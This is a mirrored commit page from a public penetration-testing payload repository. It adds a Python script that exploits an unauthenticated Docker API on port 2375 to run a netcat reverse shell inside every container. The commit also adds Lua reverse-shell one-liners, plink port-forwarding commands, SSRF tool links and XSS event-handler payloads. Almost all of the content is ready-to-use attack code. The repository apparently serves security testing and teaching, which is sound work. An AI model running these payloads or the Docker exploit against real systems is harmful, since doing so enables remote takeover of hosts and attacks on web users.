mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Script Docker RCE
This commit is contained in:
parent
f8019e2234
commit
f1eefd2722
48
CVE Exploits/Docker API RCE.py
Normal file
48
CVE Exploits/Docker API RCE.py
Normal file
@ -0,0 +1,48 @@
|
|||||||
|
import requests
|
||||||
|
import logging
|
||||||
|
import json
|
||||||
|
import urllib.parse
|
||||||
|
|
||||||
|
# NOTE
|
||||||
|
# Enable Remote API with the following command
|
||||||
|
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
|
||||||
|
# This is an intended feature, remember to filter the port 2375..
|
||||||
|
|
||||||
|
name = "docker"
|
||||||
|
description = "Docker RCE via Open Docker API on port 2375"
|
||||||
|
author = "Swissky"
|
||||||
|
|
||||||
|
# Step 1 - Extract id and name from each container
|
||||||
|
ip = "127.0.0.1"
|
||||||
|
port = "2375"
|
||||||
|
data = "containers/json"
|
||||||
|
url = "http://{}:{}/{}".format(ip, port, data)
|
||||||
|
r = requests.get(url)
|
||||||
|
|
||||||
|
if r.json:
|
||||||
|
for container in r.json():
|
||||||
|
container_id = container['Id']
|
||||||
|
container_name = container['Names'][0].replace('/','')
|
||||||
|
print(container_id, container_name)
|
||||||
|
|
||||||
|
# Step 2 - Prepare command
|
||||||
|
cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
|
||||||
|
data = "containers/{}/exec".format(container_name)
|
||||||
|
url = "http://{}:{}/{}".format(ip, port, data)
|
||||||
|
post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
|
||||||
|
post_header = {
|
||||||
|
"Content-Type": "application/json"
|
||||||
|
}
|
||||||
|
r = requests.post(url, json=json.loads(post_json))
|
||||||
|
|
||||||
|
|
||||||
|
# Step 3 - Execute command
|
||||||
|
id_cmd = r.json()['Id']
|
||||||
|
data = "exec/{}/start".format(id_cmd)
|
||||||
|
url = "http://{}:{}/{}".format(ip, port, data)
|
||||||
|
post_json = '{ "Detach":false,"Tty":false}'
|
||||||
|
post_header = {
|
||||||
|
"Content-Type": "application/json"
|
||||||
|
}
|
||||||
|
r = requests.post(url, json=json.loads(post_json))
|
||||||
|
print(r)
|
@ -92,6 +92,14 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
|||||||
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## plink
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server
|
||||||
|
plink -l root -pw mypassword 192.168.18.84 -R
|
||||||
|
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
|
||||||
|
```
|
||||||
|
|
||||||
## Basic Pivoting Types
|
## Basic Pivoting Types
|
||||||
|
|
||||||
| Type | Use Case |
|
| Type | Use Case |
|
||||||
|
@ -116,10 +116,18 @@ p.waitFor()
|
|||||||
|
|
||||||
### Lua
|
### Lua
|
||||||
|
|
||||||
|
Linux only
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Windows and Linux
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||||
|
```
|
||||||
|
|
||||||
### NodeJS
|
### NodeJS
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
@ -115,6 +115,7 @@ Grab a book and relax, these ones are the best security books (in my opinion).
|
|||||||
| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
|
| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
|
||||||
| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
|
| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
|
||||||
| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
|
| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
|
||||||
|
| `docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite` | [Damn Vulnerable NodeJS Application](https://github.com/appsecco/dvna) |
|
||||||
| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
|
| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
|
||||||
| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
|
| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
|
||||||
| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
|
| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
|
||||||
|
@ -2,6 +2,11 @@
|
|||||||
|
|
||||||
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
|
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
|
||||||
|
|
||||||
|
Tools:
|
||||||
|
|
||||||
|
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
|
||||||
|
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Exploit with localhost](#summary)
|
* [Exploit with localhost](#summary)
|
||||||
@ -85,7 +90,6 @@ Bypass localhost with a domain redirecting to locahost
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://localtest.me
|
http://localtest.me
|
||||||
http://n-pn.info
|
|
||||||
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -95,6 +95,11 @@ XSS for HTML5
|
|||||||
<details/open/ontoggle="alert`1`">
|
<details/open/ontoggle="alert`1`">
|
||||||
<audio src onloadstart=alert(1)>
|
<audio src onloadstart=alert(1)>
|
||||||
<marquee onstart=alert(1)>
|
<marquee onstart=alert(1)>
|
||||||
|
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
|
||||||
|
|
||||||
|
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
|
||||||
|
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
|
||||||
|
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS using script tag (external payload)
|
XSS using script tag (external payload)
|
||||||
|
Loading…
Reference in New Issue
Block a user